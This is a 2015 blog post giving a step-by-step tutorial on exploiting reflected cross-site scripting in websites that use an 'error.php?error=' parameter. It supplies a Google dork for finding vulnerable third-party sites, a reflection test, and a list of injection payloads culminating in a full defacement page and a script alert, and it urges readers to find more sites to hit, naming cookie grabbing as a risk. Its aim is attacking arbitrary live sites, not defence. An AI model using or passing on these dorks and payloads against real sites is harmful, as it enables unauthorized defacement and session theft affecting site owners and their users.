Saturday, October 31, 2015

error.php XSS (Cross Site Scripting) Vulnerabilities 2016

error.php XSS (Cross Site Scripting) Vulnerabilities
Title : error.php XSS 

Risk : Cross site scripting, cookie Grabbing 
Poc : error.php?error=
Dork : "inurl:error.php?error="
Author : Minhal Mehdi (
browser : Mozilla Firefox 

error.php XSS (Cross Site Scripting) Vulnerabilities

1). Go to Google and now type the dork "inurl:error.php?error="
in search results ignore all the extra results with different URL Like : error-php-error.php
pick site with url Only..

2). Now Type your first Tag to Check the vulnerability 
example :<h1>Test</h1>
if it will show you "Test" word in Header tag this Its Vulnerable

Here are few ways in you you can inject your xss vector :) ..

How To show Header XSS injection:<h1>Hacked</h1>

To show header in center XSS injection:<center><h1>Hacked</h1></center>

How to show Title XSS injection:<title>Hacked</title>

How to Add a Image XSS injection:<img src=""/>

How to add a Message XSS injection<p><b>Your Message Here<b></p>

How to write message in next lines XSS injection:<p><b>First line<br>Second Line <b></p> 

How To add a scrolling Text XSS injection:<marquee>Scrolling text Here</marquee>

How To Add a alert box XSS injection:<script>alert("hello");</script>

How To add background colour in page XSS injection:<body bgcolor="red"/>

How to Add a full deface Page XSS injection:<title>Hacked</title><center><h1>hacked<h1><body bgcolor="red"/><p><b>You have been Hacked<br></b></p><img src=""/>

you can add more html and javscript tags here,
here is another demo site :<center><h1></h1></center>
find More website with dorks :)

if you have any queries feel free to comment below :)

0 on: "error.php XSS (Cross Site Scripting) Vulnerabilities 2016"